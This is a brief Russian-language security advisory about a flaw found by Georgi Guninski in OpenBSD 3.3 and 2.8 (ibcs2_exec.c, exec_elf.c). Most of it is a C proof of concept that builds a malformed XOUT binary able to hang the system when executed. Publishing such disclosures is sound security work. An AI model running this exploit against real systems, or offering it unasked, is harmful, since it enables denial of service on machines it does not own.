Georgi Guninski обнаружил новую
уязвимость в . По его словам выполнение
специально сконструированного бинарного
файла может подвесить OpenBSD 3.3 и 2.8. Проблема
кроется в файле ibcs2_exec.c (процедура может
неправильно выделить память, что приведет к
сбою в работе) и в exec_elf.c.
Пример программы:
int main(int ac,char **av)
{
int fd;
struct xexec xp;
struct xext xep;
char exe[10];
char fil[]="./vvc";
fd=open(fil,O_CREAT|O_RDWR,0700);
if (fd==-1) {perror("open");return 1;}
memset(&xp,0,sizeof(xp));
memset(&xep,0,sizeof(xep));
memset(exe,'v',sizeof(exe));
xp.x_magic = XOUT_MAGIC;
xp.x_cpu = XC_386;
xp.x_renv = XE_EXEC;
xp.x_ext = sizeof(xep);
xep.xe_segsize = -1;
write(fd,&xp,sizeof(xp));
write(fd,&xep,sizeof(xep));
write(fd,exe,sizeof(exe));
printf("Now exec %s\n",fil);
}
